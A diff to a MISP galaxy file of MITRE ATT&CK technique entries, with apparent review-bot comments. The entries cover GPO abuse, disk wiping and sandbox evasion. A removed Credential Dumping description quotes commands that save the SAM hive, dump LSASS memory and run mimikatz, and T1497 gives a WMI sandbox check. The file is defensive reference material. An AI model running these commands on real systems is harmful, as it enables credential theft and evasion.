@@ -6748,7 +7071,7 @@ "value": "Malicious SMS Message - T1454" }, { - "description": "As further described in [ATT&CK for Enterprise](https://attack.mitre.org/techniques/T1195), supply chain compromise is the manipulation of products or product delivery mechanisms prior to receipt by a final consumer for the purpose of data or system compromise. Somewhat related, adversaries could also identify and exploit inadvertently present vulnerabilities. In many cases, it may be difficult to be certain whether exploitable functionality is due to malicious intent or simply inadvertent mistake.\n\nRelated PRE-ATT&CK techniques include:\n\n* [Identify vulnerabilities in third-party software libraries](https://attack.mitre.org/techniques/T1389) - Third-party libraries incorporated into mobile apps could contain malicious behavior, privacy-invasive behavior, or exploitable vulnerabilities. An adversary could deliberately insert malicious behavior or could exploit inadvertent vulnerabilities. For example, Ryan Welton of NowSecure identified exploitable remote code execution vulnerabilities in a third-party advertisement library (Citation: NowSecure-RemoteCode). Grace et al. identified security issues in mobile advertisement libraries (Citation: Grace-Advertisement).\n* [Distribute malicious software development tools](https://attack.mitre.org/techniques/T1394) - As demonstrated by the XcodeGhost attack (Citation: PaloAlto-XcodeGhost1), app developers could be provided with modified versions of software development tools (e.g. compilers) that automatically inject malicious or exploitable code into applications.", + "description": "As further described in [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195), supply chain compromise is the manipulation of products or product delivery mechanisms prior to receipt by a final consumer for the purpose of data or system compromise. 
Somewhat related, adversaries could also identify and exploit inadvertently present vulnerabilities. In many cases, it may be difficult to be certain whether exploitable functionality is due to malicious intent or simply inadvertent mistake.\n\nRelated PRE-ATT&CK techniques include:\n\n* [Identify vulnerabilities in third-party software libraries](https://attack.mitre.org/techniques/T1389) - Third-party libraries incorporated into mobile apps could contain malicious behavior, privacy-invasive behavior, or exploitable vulnerabilities. An adversary could deliberately insert malicious behavior or could exploit inadvertent vulnerabilities. For example, Ryan Welton of NowSecure identified exploitable remote code execution vulnerabilities in a third-party advertisement library (Citation: NowSecure-RemoteCode). Grace et al. identified security issues in mobile advertisement libraries (Citation: Grace-Advertisement).\n* [Distribute malicious software development tools](https://attack.mitre.org/techniques/T1394) - As demonstrated by the XcodeGhost attack (Citation: PaloAlto-XcodeGhost1), app developers could be provided with modified versions of software development tools (e.g. compilers) that automatically inject malicious or exploitable code into applications.", "meta": { "external_id": "APP-6", "kill_chain": [ 
@@ -6785,6 +7108,58 @@
 "uuid": "8e27551a-5080-4148-a584-c64348212e4f",
 "value": "Wipe Device Data - T1447"
 },
+ {
+ "description": "Adversaries may modify Group Policy Objects (GPOs) to subvert the intended discretionary access controls for a domain, usually with the intention of escalating privileges on the domain. \n\nGroup policy allows for centralized management of user and computer settings in Active Directory (AD). GPOs are containers for group policy settings made up of files stored within a predicable network path \\\\<DOMAIN>\\SYSVOL\\<DOMAIN>\\Policies\\.(Citation: TechNet Group Policy Basics)(Citation: ADSecurity GPO Persistence 2016) \n\nLike other objects in AD, GPOs have access controls associated with them. By default all user accounts in the domain have permission to read GPOs. It is possible to delegate GPO access control permissions, e.g. write access, to specific users or groups in the domain.\n\nMalicious GPO modifications can be used to implement [Scheduled Task](https://attack.mitre.org/techniques/T1053), [Disabling Security Tools](https://attack.mitre.org/techniques/T1089), [Remote File Copy](https://attack.mitre.org/techniques/T1105), [Create Account](https://attack.mitre.org/techniques/T1136), [Service Execution](https://attack.mitre.org/techniques/T1035) and more.(Citation: ADSecurity GPO Persistence 2016)(Citation: Wald0 Guide to GPOs)(Citation: Harmj0y Abusing GPO Permissions)(Citation: Mandiant M Trends 2016)(Citation: Microsoft Hacking Team Breach) Since GPOs can control so many user and machine settings in the AD environment, there are a great number of potential attacks that can stem from this GPO abuse.(Citation: Wald0 Guide to GPOs) Publicly available scripts such as New-GPOImmediateTask can be leveraged to automate the creation of a malicious [Scheduled Task](https://attack.mitre.org/techniques/T1053) by modifying GPO settings, in this case modifying <GPO_PATH>\\Machine\\Preferences\\ScheduledTasks\\ScheduledTasks.xml.(Citation: Wald0 Guide to GPOs)(Citation: Harmj0y Abusing GPO Permissions) In some cases an adversary might modify specific user rights like SeEnableDelegationPrivilege, set in <GPO_PATH>\\MACHINE\\Microsoft\\Windows NT\\SecEdit\\GptTmpl.inf, to achieve a subtle AD backdoor with complete control of the domain because the user account under the adversary's control would then be able to modify GPOs.(Citation: Harmj0y SeEnableDelegationPrivilege Right)\n",
+ "meta": {
+ "external_id": "T1484",
+ "kill_chain": [
+ "mitre-attack:defense-evasion"
+ ],
+ "mitre_data_sources": [
+ "Windows event logs"
+ ],
+ "mitre_platforms": [
+ "Windows"
+ ],
+ "refs": [
+ "https://attack.mitre.org/techniques/T1484",
+ "https://blogs.technet.microsoft.com/musings_of_a_technical_tam/2012/02/13/group-policy-basics-part-1-understanding-the-structure-of-a-group-policy-object/",
+ "https://adsecurity.org/?p=2716",
+ "https://wald0.com/?p=179",
+ "http://www.harmj0y.net/blog/redteaming/abusing-gpo-permissions/",
+ "https://www.fireeye.com/content/dam/fireeye-www/current-threats/pdfs/rpt-mtrends-2016.pdf",
+ "https://www.microsoft.com/security/blog/2016/06/01/hacking-team-breach-a-cyber-jurassic-park/",
+ "http://www.harmj0y.net/blog/activedirectory/the-most-dangerous-user-right-you-probably-have-never-heard-of/"
+ ]
+ },
+ "uuid": "ebb42bbe-62d7-47d7-a55f-3b08b61d792d",
+ "value": "Group Policy Modification - T1484"
+ },
+ {
+ "description": "Adversaries may modify systems in order to manipulate the data as it is accessed and displayed to an end user.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating runtime data, adversaries may attempt to affect a business process, organizational understanding, and decision making. \n\nAdversaries may alter application binaries used to display data in order to cause runtime manipulations. Adversaries may also conduct [Change Default File Association](https://attack.mitre.org/techniques/T1042) and [Masquerading](https://attack.mitre.org/techniques/T1036) to cause a similar effect. The type of modification and the impact it will have depends on the target application and process as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact.",
+ "meta": {
+ "external_id": "T1494",
+ "kill_chain": [
+ "mitre-attack:impact"
+ ],
+ "mitre_data_sources": [
+ "File monitoring",
+ "Process monitoring"
+ ],
+ "mitre_platforms": [
+ "Linux",
+ "macOS",
+ "Windows"
+ ],
+ "refs": [
+ "https://attack.mitre.org/techniques/T1494",
+ "https://content.fireeye.com/apt/rpt-apt38",
+ "https://www.justice.gov/opa/press-release/file/1092091/download"
+ ]
+ },
+ "uuid": "ca205a36-c1ad-488b-aa6c-ab34bdd3a36b",
+ "value": "Runtime Data Manipulation - T1494"
+ },
 {
 "description": "A message sent over a radio interface (typically cellular, but potentially Bluetooth, GPS, NFC, Wi-Fi or other) to the mobile device could exploit a vulnerability in code running on the device.\n\nD. Komaromy and N. Golde demonstrated baseband exploitation of a Samsung mobile device at the PacSec 2015 security conference (Citation: Register-BaseStation).\n\nWeinmann described and demonstrated \"the risk of remotely exploitable memory corruptions in cellular baseband stacks.\" (Citation: Weinmann-Baseband)\n\nPlatforms: Android, iOS",
 "meta": {
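Review bot: The new T1494 entry is the first in this view to put `"mitre-attack:impact"` in `kill_chain`, and nothing in the patch shows that tactic being added to the galaxy definition's `kill_chain_order`; if it is not already listed there (not visible here), the cluster still loads but MISP will have no column to place it in when rendering the ATT&CK matrix. The same applies to T1487 and T1488 in the following hunk. As a style point, the T1484 description keeps upstream's trailing whitespace (`on the domain. \n\n` and a closing `\n` right before the quote) while the neighbouring entries do not, so running the galaxy's JSON validator/formatter before merging would keep the file uniform.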
@@ -6826,33 +7201,59 @@ "value": "Malicious Media Content - T1457" }, { - "description": "Link-Local Multicast Name Resolution (LLMNR) and NetBIOS Name Service (NBT-NS) are Microsoft Windows components that serve as alternate methods of host identification. LLMNR is based upon the Domain Name System (DNS) format and allows hosts on the same local link to perform name resolution for other hosts. NBT-NS identifies systems on a local network by their NetBIOS name. (Citation: Wikipedia LLMNR) (Citation: TechNet NetBIOS)\n\nAdversaries can spoof an authoritative source for name resolution on a victim network by responding to LLMNR (UDP 5355)/NBT-NS (UDP 137) traffic as if they know the identity of the requested host, effectively poisoning the service so that the victims will communicate with the adversary controlled system. If the requested host belongs to a resource that requires identification/authentication, the username and NTLMv2 hash will then be sent to the adversary controlled system. The adversary can then collect the hash information sent over the wire through tools that monitor the ports for traffic or through [Network Sniffing](https://attack.mitre.org/techniques/T1040) and crack the hashes offline through [Brute Force](https://attack.mitre.org/techniques/T1110) to obtain the plaintext passwords.\n\nSeveral tools exist that can be used to poison name services within local networks such as NBNSpoof, Metasploit, and [Responder](https://attack.mitre.org/software/S0174). (Citation: GitHub NBNSpoof) (Citation: Rapid7 LLMNR Spoofer) (Citation: GitHub Responder)", + "description": "Adversaries may corrupt or wipe the disk data structures on hard drive necessary to boot systems; targeting specific critical systems as well as a large number of systems in a network to interrupt availability to system and network resources. 
\n\nAdversaries may attempt to render the system unable to boot by overwriting critical data located in structures such as the master boot record (MBR) or partition table.(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)(Citation: Unit 42 Shamoon3 2018) The data contained in disk structures may include the initial executable code for loading an operating system or the location of the file system partitions on disk. If this information is not present, the computer will not be able to load an operating system during the boot process, leaving the computer unavailable. [Disk Structure Wipe](https://attack.mitre.org/techniques/T1487) may be performed in isolation, or along with [Disk Content Wipe](https://attack.mitre.org/techniques/T1488) if all sectors of a disk are wiped.\n\nTo maximize impact on the target organization, malware designed for destroying disk structures may have worm-like features to propagate across a network by leveraging other techniques like [Valid Accounts](https://attack.mitre.org/techniques/T1078), [Credential Dumping](https://attack.mitre.org/techniques/T1003), and [Windows Admin Shares](https://attack.mitre.org/techniques/T1077).(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)", "meta": { - "external_id": "T1171", + "external_id": "T1487", "kill_chain": [ - "mitre-attack:credential-access" + "mitre-attack:impact" ], "mitre_data_sources": [ - "Windows Registry", - "Packet capture", - "Netflow/Enclave netflow" + "Kernel drivers", + "MBR" ], "mitre_platforms": [ + "Windows", + "macOS", + "Linux" + ], + "refs": [ + "https://attack.mitre.org/techniques/T1487", + "https://www.symantec.com/connect/blogs/shamoon-attacks", + "https://www.fireeye.com/blog/threat-research/2016/11/fireeye_respondsto.html", + 
"http://researchcenter.paloaltonetworks.com/2016/11/unit42-shamoon-2-return-disttrack-wiper/", + "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07180722/Report_Shamoon_StoneDrill_final.pdf", + "https://unit42.paloaltonetworks.com/shamoon-3-targets-oil-gas-organization/" + ] + }, + "uuid": "2e114e45-2c50-404c-804a-3af9564d240e", + "value": "Disk Structure Wipe - T1487" + }, + { + "description": "Adversaries may erase the contents of storage devices on specific systems as well as large numbers of systems in a network to interrupt availability to system and network resources.\n\nAdversaries may partially or completely overwrite the contents of a storage device rendering the data irrecoverable through the storage interface.(Citation: Novetta Blockbuster)(Citation: Novetta Blockbuster Destructive Malware)(Citation: DOJ Lazarus Sony 2018) Instead of wiping specific disk structures or files, adversaries with destructive intent may wipe arbitrary portions of disk content. 
To wipe disk content, adversaries may acquire direct access to the hard drive in order to overwrite arbitrarily sized portions of disk with random data.(Citation: Novetta Blockbuster Destructive Malware) Adversaries have been observed leveraging third-party drivers like [RawDisk](https://attack.mitre.org/software/S0364) to directly access disk content.(Citation: Novetta Blockbuster)(Citation: Novetta Blockbuster Destructive Malware) This behavior is distinct from [Data Destruction](https://attack.mitre.org/techniques/T1485) because sections of the disk erased instead of individual files.\n\nTo maximize impact on the target organization in operations where network-wide availability interruption is the goal, malware used for wiping disk content may have worm-like features to propagate across a network by leveraging additional techniques like [Valid Accounts](https://attack.mitre.org/techniques/T1078), [Credential Dumping](https://attack.mitre.org/techniques/T1003), and [Windows Admin Shares](https://attack.mitre.org/techniques/T1077).(Citation: Novetta Blockbuster Destructive Malware)", + "meta": { + "external_id": "T1488", + "kill_chain": [ + "mitre-attack:impact" + ], + "mitre_data_sources": [ + "Kernel drivers", + "Process monitoring", + "Process command-line parameters" + ], + "mitre_platforms": [ + "Linux", + "macOS", "Windows" ], "refs": [ - "https://attack.mitre.org/techniques/T1171", - "https://en.wikipedia.org/wiki/Link-Local_Multicast_Name_Resolution", - "https://technet.microsoft.com/library/cc958811.aspx", - "https://www.sternsecurity.com/blog/local-network-attacks-llmnr-and-nbt-ns-poisoning", - "https://github.com/Kevin-Robertson/Conveigh", - "https://github.com/SpiderLabs/Responder", - "https://github.com/nomex/nbnspoof", - "https://www.rapid7.com/db/modules/auxiliary/spoof/llmnr/llmnr_response" + "https://attack.mitre.org/techniques/T1488", + "https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Report.pdf", + 
"https://operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Destructive-Malware-Report.pdf", + "https://www.justice.gov/opa/press-release/file/1092091/download" ] }, - "uuid": "0dbf5f1b-a560-4d51-ac1b-d70caab3e1f0", - "value": "LLMNR/NBT-NS Poisoning - T1171" + "uuid": "b82f7d37-b826-4ec9-9391-8e121c78aed7", + "value": "Disk Content Wipe - T1488" }, { "description": "A payload is the part of the malware which performs a malicious action. The adversary may re-use payloads when the needed capability is already available. (Citation: SonyDestover)", 
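Review bot: This hunk removes the existing `LLMNR/NBT-NS Poisoning - T1171` entry (uuid `0dbf5f1b-a560-4d51-ac1b-d70caab3e1f0`) in the same place it adds T1487, rather than adding T1487 alongside it; unless T1171 is re-added in a hunk outside this view, events already tagged with that cluster's uuid or value will stop resolving, and nothing in the hunk indicates the technique was revoked or merged upstream. If it really was retired, the safer convention for a galaxy is to keep the entry and flag it as revoked/deprecated so existing tags keep resolving, and to delete only when the upstream mapping confirms the removal. A minor consistency point: T1487 lists `mitre_platforms` as `Windows, macOS, Linux` while T1488 directly below uses `Linux, macOS, Windows`; keeping one order avoids noisy diffs on the next regeneration.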
@@ -7040,7 +7441,7 @@ "value": "Multi-hop Proxy - T1188" }, { - "description": "A drive-by compromise is when an adversary gains access to a system through a user visiting a website over the normal course of browsing. With this technique, the user's web browser is targeted for exploitation. This can happen in several ways, but there are a few main components: \n\nMultiple ways of delivering exploit code to a browser exist, including:\n\n* A legitimate website is compromised where adversaries have injected some form of malicious code such as JavaScript, iFrames, cross-site scripting.\n* Malicious ads are paid for and served through legitimate ad providers.\n* Built-in web application interfaces are leveraged for the insertion of any other kind of object that can be used to display web content or contain a script that executes on the visiting client (e.g. forum posts, comments, and other user controllable web content).\n\nOften the website used by an adversary is one visited by a specific community, such as government, a particular industry, or region, where the goal is to compromise a specific user or set of users based on a shared interest. This kind of targeted attack is referred to a strategic web compromise or watering hole attack. There are several known examples of this occurring. (Citation: Shadowserver Strategic Web Compromise)\n\nTypical drive-by compromise process:\n\n1. A user visits a website that is used to host the adversary controlled content.\n2. Scripts automatically execute, typically searching versions of the browser and plugins for a potentially vulnerable version. \n * The user may be required to assist in this process by enabling scripting or active website components and ignoring warning dialog boxes.\n3. Upon finding a vulnerable version, exploit code is delivered to the browser.\n4. 
If exploitation is successful, then it will give the adversary code execution on the user's system unless other protections are in place.\n * In some cases a second visit to the website after the initial scan is required before exploit code is delivered.\n\nUnlike [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190), the focus of this technique is to exploit software on a client endpoint upon visiting a website. This will commonly give an adversary access to systems on the internal network instead of external systems that may be in a DMZ.", + "description": "A drive-by compromise is when an adversary gains access to a system through a user visiting a website over the normal course of browsing. With this technique, the user's web browser is targeted for exploitation.\n\nMultiple ways of delivering exploit code to a browser exist, including:\n\n* A legitimate website is compromised where adversaries have injected some form of malicious code such as JavaScript, iFrames, cross-site scripting.\n* Malicious ads are paid for and served through legitimate ad providers.\n* Built-in web application interfaces are leveraged for the insertion of any other kind of object that can be used to display web content or contain a script that executes on the visiting client (e.g. forum posts, comments, and other user controllable web content).\n\nOften the website used by an adversary is one visited by a specific community, such as government, a particular industry, or region, where the goal is to compromise a specific user or set of users based on a shared interest. This kind of targeted attack is referred to a strategic web compromise or watering hole attack. There are several known examples of this occurring. (Citation: Shadowserver Strategic Web Compromise)\n\nTypical drive-by compromise process:\n\n1. A user visits a website that is used to host the adversary controlled content.\n2. 
Scripts automatically execute, typically searching versions of the browser and plugins for a potentially vulnerable version. \n * The user may be required to assist in this process by enabling scripting or active website components and ignoring warning dialog boxes.\n3. Upon finding a vulnerable version, exploit code is delivered to the browser.\n4. If exploitation is successful, then it will give the adversary code execution on the user's system unless other protections are in place.\n * In some cases a second visit to the website after the initial scan is required before exploit code is delivered.\n\nUnlike [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190), the focus of this technique is to exploit software on a client endpoint upon visiting a website. This will commonly give an adversary access to systems on the internal network instead of external systems that may be in a DMZ.", "meta": { "external_id": "T1189", "kill_chain": [ 
@@ -7068,7 +7469,7 @@
 "value": "Drive-by Compromise - T1189"
 },
 {
- "description": "As described by [ATT&CK for Enterprise](https://attack.mitre.org/techniques/T1189), a drive-by compromise is when an adversary gains access to a system through a user visiting a website over the normal course of browsing. With this technique, the user's web browser is targeted for exploitation. For example, a website may contain malicious media content intended to exploit vulnerabilities in media parsers as demonstrated by the Android Stagefright vulnerability (Citation: Zimperium-Stagefright).\n\n(This technique was formerly known as Malicious Web Content. It has been renamed to better align with ATT&CK for Enterprise.)",
+ "description": "As described by [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), a drive-by compromise is when an adversary gains access to a system through a user visiting a website over the normal course of browsing. With this technique, the user's web browser is targeted for exploitation. For example, a website may contain malicious media content intended to exploit vulnerabilities in media parsers as demonstrated by the Android Stagefright vulnerability (Citation: Zimperium-Stagefright).\n\n(This technique was formerly known as Malicious Web Content. It has been renamed to better align with ATT&CK for Enterprise.)",
 "meta": {
 "external_id": "CEL-22",
 "kill_chain": [
@@ -7129,6 +7530,34 @@ "uuid": "6063b486-a247-499b-976a-9de16f4e83bc", "value": "Develop KITs/KIQs - T1227" }, + { + "description": "Adversaries may check for the presence of a virtual machine environment (VME) or sandbox to avoid potential detection of tools and activities. If the adversary detects a VME, they may alter their malware to conceal the core functions of the implant or disengage from the victim. They may also search for VME artifacts before dropping secondary or additional payloads. \n\nAdversaries may use several methods including [Security Software Discovery](https://attack.mitre.org/techniques/T1063) to accomplish [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) by searching for security monitoring tools (e.g., Sysinternals, Wireshark, etc.) to help determine if it is an analysis environment. Additional methods include use of sleep timers or loops within malware code to avoid operating within a temporary sandboxes. (Citation: Unit 42 Pirpi July 2015)\n\n###Virtual Machine Environment Artifacts Discovery###\n\nAdversaries may use utilities such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047), [PowerShell](https://attack.mitre.org/techniques/T1086), [Systeminfo](https://attack.mitre.org/software/S0096), and the [Query Registry](https://attack.mitre.org/techniques/T1012) to obtain system information and search for VME artifacts. Adversaries may search for VME artifacts in memory, processes, file system, and/or the Registry. Adversaries may use [Scripting](https://attack.mitre.org/techniques/T1064) to combine these checks into one script and then have the program exit if it determines the system to be a virtual environment. Also, in applications like VMWare, adversaries can use a special I/O port to send commands and receive output. Adversaries may also check the drive size. For example, this can be done using the Win32 DeviceIOControl function. 
\n\nExample VME Artifacts in the Registry(Citation: McAfee Virtual Jan 2017)\n\n* HKLM\\SOFTWARE\\Oracle\\VirtualBox Guest Additions\n* HKLM\\HARDWARE\\Description\\System\\”SystemBiosVersion”;”VMWARE”\n* HKLM\\HARDWARE\\ACPI\\DSDT\\BOX_\n\nExample VME files and DLLs on the system(Citation: McAfee Virtual Jan 2017)\n\n* WINDOWS\\system32\\drivers\\vmmouse.sys \n* WINDOWS\\system32\\vboxhook.dll\n* Windows\\system32\\vboxdisp.dll\n\nCommon checks may enumerate services running that are unique to these applications, installed programs on the system, manufacturer/product fields for strings relating to virtual machine applications, and VME-specific hardware/processor instructions.(Citation: McAfee Virtual Jan 2017)\n\n###User Activity Discovery###\n\nAdversaries may search for user activity on the host (e.g., browser history, cache, bookmarks, number of files in the home directories, etc.) for reassurance of an authentic environment. They might detect this type of information via user interaction and digital signatures. They may have malware check the speed and frequency of mouse clicks to determine if it’s a sandboxed environment.(Citation: Sans Virtual Jan 2016) Other methods may rely on specific user interaction with the system before the malicious code is activated. Examples include waiting for a document to close before activating a macro (Citation: Unit 42 Sofacy Nov 2018) and waiting for a user to double click on an embedded image to activate (Citation: FireEye FIN7 April 2017).\n\n###Virtual Hardware Fingerprinting Discovery###\n\nAdversaries may check the fan and temperature of the system to gather evidence that can be indicative a virtual environment. An adversary may perform a CPU check using a WMI query $q = “Select * from Win32_Fan” Get-WmiObject -Query $q. If the results of the WMI query return more than zero elements, this might tell them that the machine is a physical one. 
(Citation: Unit 42 OilRig Sept 2018)", + "meta": { + "external_id": "T1497", + "kill_chain": [ + "mitre-attack:defense-evasion", + "mitre-attack:discovery" + ], + "mitre_data_sources": [ + "Process monitoring", + "Process command-line parameters" + ], + "mitre_platforms": [ + "Windows" + ], + "refs": [ + "https://attack.mitre.org/techniques/T1497", + "https://unit42.paloaltonetworks.com/ups-observations-on-cve-2015-3113-prior-zero-days-and-the-pirpi-payload/", + "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/stopping-malware-fake-virtual-machine/", + "https://www.sans.org/reading-room/whitepapers/forensics/detecting-malware-sandbox-evasion-techniques-36667", + "https://unit42.paloaltonetworks.com/unit42-sofacy-continues-global-attacks-wheels-new-cannon-trojan/", + "https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html", + "https://researchcenter.paloaltonetworks.com/2018/09/unit42-oilrig-targets-middle-eastern-government-adds-evasion-techniques-oopsie/" + ] + }, + "uuid": "82caa33e-d11a-433a-94ea-9b5a5fbef81d", + "value": "Virtualization/Sandbox Evasion - T1497" + }, { "description": "Command and control (C2) communications are hidden (but not necessarily encrypted) in an attempt to make the content more difficult to discover or decipher and to make the communication less conspicuous and hide commands from being seen. This encompasses many methods, such as adding junk data to protocol traffic, using steganography, commingling legitimate traffic with C2 communications traffic, or using a non-standard data encoding system, such as a modified Base64 encoding for the message body of an HTTP request.", "meta": { 
@@ -7263,7 +7692,7 @@ "value": "Data Compressed - T1002" }, { - "description": "Credential dumping is the process of obtaining account login and password information, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.\n\nSeveral of the tools mentioned in this technique may be used by both adversaries and professional security testers. Additional custom tools likely exist as well.\n\n### Windows\n\n#### SAM (Security Accounts Manager)\n\nThe SAM is a database file that contains local accounts for the host, typically those found with the ‘net user’ command. To enumerate the SAM database, system level access is required.\n \nA number of tools can be used to retrieve the SAM file through in-memory techniques:\n\n* pwdumpx.exe \n* [gsecdump](https://attack.mitre.org/software/S0008)\n* [Mimikatz](https://attack.mitre.org/software/S0002)\n* secretsdump.py\n\nAlternatively, the SAM can be extracted from the Registry with [Reg](https://attack.mitre.org/software/S0075):\n\n* reg save HKLM\\sam sam\n* reg save HKLM\\system system\n\nCreddump7 can then be used to process the SAM database locally to retrieve hashes. (Citation: GitHub Creddump7)\n\nNotes:\nRid 500 account is the local, in-built administrator.\nRid 501 is the guest account.\nUser accounts start with a RID of 1,000+.\n\n#### Cached Credentials\n\nThe DCC2 (Domain Cached Credentials version 2) hash, used by Windows Vista and newer caches credentials when the domain controller is unavailable. The number of default cached credentials varies, and this number can be altered per system. 
This hash does not allow pass-the-hash style attacks.\n \nA number of tools can be used to retrieve the SAM file through in-memory techniques.\n\n* pwdumpx.exe \n* [gsecdump](https://attack.mitre.org/software/S0008)\n* [Mimikatz](https://attack.mitre.org/software/S0002)\n\nAlternatively, reg.exe can be used to extract from the Registry and Creddump7 used to gather the credentials.\n\nNotes:\nCached credentials for Windows Vista are derived using PBKDF2.\n\n#### Local Security Authority (LSA) Secrets\n\nWith SYSTEM access to a host, the LSA secrets often allows trivial access from a local account to domain-based account credentials. The Registry is used to store the LSA secrets.\n \nWhen services are run under the context of local or domain users, their passwords are stored in the Registry. If auto-logon is enabled, this information will be stored in the Registry as well.\n \nA number of tools can be used to retrieve the SAM file through in-memory techniques.\n\n* pwdumpx.exe \n* [gsecdump](https://attack.mitre.org/software/S0008)\n* [Mimikatz](https://attack.mitre.org/software/S0002)\n* secretsdump.py\n\nAlternatively, reg.exe can be used to extract from the Registry and Creddump7 used to gather the credentials.\n\nNotes:\nThe passwords extracted by his mechanism are UTF-16 encoded, which means that they are returned in plaintext.\nWindows 10 adds protections for LSA Secrets described in Mitigation.\n\n#### NTDS from Domain Controller\n\nActive Directory stores information about members of the domain including devices and users to verify credentials and define access rights. The Active Directory domain database is stored in the NTDS.dit file. By default the NTDS file will be located in %SystemRoot%\\NTDS\\Ntds.dit of a domain controller. 
(Citation: Wikipedia Active Directory)\n \nThe following tools and techniques can be used to enumerate the NTDS file and the contents of the entire Active Directory hashes.\n\n* Volume Shadow Copy\n* secretsdump.py\n* Using the in-built Windows tool, ntdsutil.exe\n* Invoke-NinjaCopy\n\n#### Group Policy Preference (GPP) Files\n\nGroup Policy Preferences (GPP) are tools that allowed administrators to create domain policies with embedded credentials. These policies, amongst other things, allow administrators to set local accounts.\n\nThese group policies are stored in SYSVOL on a domain controller, this means that any domain user can view the SYSVOL share and decrypt the password (the AES private key was leaked on-line. (Citation: Microsoft GPP Key) (Citation: SRD GPP)\n\nThe following tools and scripts can be used to gather and decrypt the password file from Group Policy Preference XML files:\n\n* Metasploit’s post exploitation module: \"post/windows/gather/credentials/gpp\"\n* Get-GPPPassword (Citation: Obscuresecurity Get-GPPPassword)\n* gpprefdecrypt.py\n\nNotes:\nOn the SYSVOL share, the following can be used to enumerate potential XML files.\ndir /s * .xml\n\n#### Service Principal Names (SPNs)\n\nSee [Kerberoasting](https://attack.mitre.org/techniques/T1208).\n\n#### Plaintext Credentials\n\nAfter a user logs on to a system, a variety of credentials are generated and stored in the Local Security Authority Subsystem Service (LSASS) process in memory. 
These credentials can be harvested by a administrative user or SYSTEM.\n\nSSPI (Security Support Provider Interface) functions as a common interface to several Security Support Providers (SSPs): A Security Support Provider is a dynamic-link library (DLL) that makes one or more security packages available to applications.\n\nThe following SSPs can be used to access credentials:\n\nMsv: Interactive logons, batch logons, and service logons are done through the MSV authentication package.\nWdigest: The Digest Authentication protocol is designed for use with Hypertext Transfer Protocol (HTTP) and Simple Authentication Security Layer (SASL) exchanges. (Citation: TechNet Blogs Credential Protection)\nKerberos: Preferred for mutual client-server domain authentication in Windows 2000 and later.\nCredSSP:  Provides SSO and Network Level Authentication for Remote Desktop Services. (Citation: Microsoft CredSSP)\n \nThe following tools can be used to enumerate credentials:\n\n* [Windows Credential Editor](https://attack.mitre.org/software/S0005)\n* [Mimikatz](https://attack.mitre.org/software/S0002)\n\nAs well as in-memory techniques, the LSASS process memory can be dumped from the target host and analyzed on a local system.\n\nFor example, on the target host use procdump:\n* procdump -ma lsass.exe lsass_dump\n\nLocally, mimikatz can be run:\n\n* sekurlsa::Minidump lsassdump.dmp\n* sekurlsa::logonPasswords\n\n#### DCSync\n\nDCSync is a variation on credential dumping which can be used to acquire sensitive information from a domain controller. Rather than executing recognizable malicious code, the action works by abusing the domain controller's application programming interface (API) (Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft GetNCCChanges) (Citation: Samba DRSUAPI) (Citation: Wine API samlib.dll) to simulate the replication process from a remote domain controller. 
Any members of the Administrators, Domain Admins, Enterprise Admin groups or computer accounts on the domain controller are able to run DCSync to pull password data (Citation: ADSecurity Mimikatz DCSync) from Active Directory, which may include current and historical hashes of potentially useful accounts such as KRBTGT and Administrators. The hashes can then in turn be used to create a Golden Ticket for use in [Pass the Ticket](https://attack.mitre.org/techniques/T1097) (Citation: Harmj0y Mimikatz and DCSync) or change an account's password as noted in [Account Manipulation](https://attack.mitre.org/techniques/T1098). (Citation: InsiderThreat ChangeNTLM July 2017) DCSync functionality has been included in the \"lsadump\" module in Mimikatz. (Citation: GitHub Mimikatz lsadump Module) Lsadump also includes NetSync, which performs DCSync over a legacy replication protocol. (Citation: Microsoft NRPC Dec 2017)\n\n### Linux\n\n#### Proc filesystem\n\nThe /proc filesystem on Linux contains a great deal of information regarding the state of the running operating system. Processes running with root privileges can use this facility to scrape live memory of other running programs. If any of these programs store passwords in clear text or password hashes in memory, these values can then be harvested for either usage or brute force attacks, respectively. This functionality has been implemented in the [MimiPenguin](https://attack.mitre.org/software/S0179), an open source tool inspired by [Mimikatz](https://attack.mitre.org/software/S0002). The tool dumps process memory, then harvests passwords and hashes by looking for text strings and regex patterns for how given applications such as Gnome Keyring, sshd, and Apache use memory to store such authentication artifacts.", + "description": "Credential dumping is the process of obtaining account login and password information, normally in the form of a hash or a clear text password, from the operating system and software. 
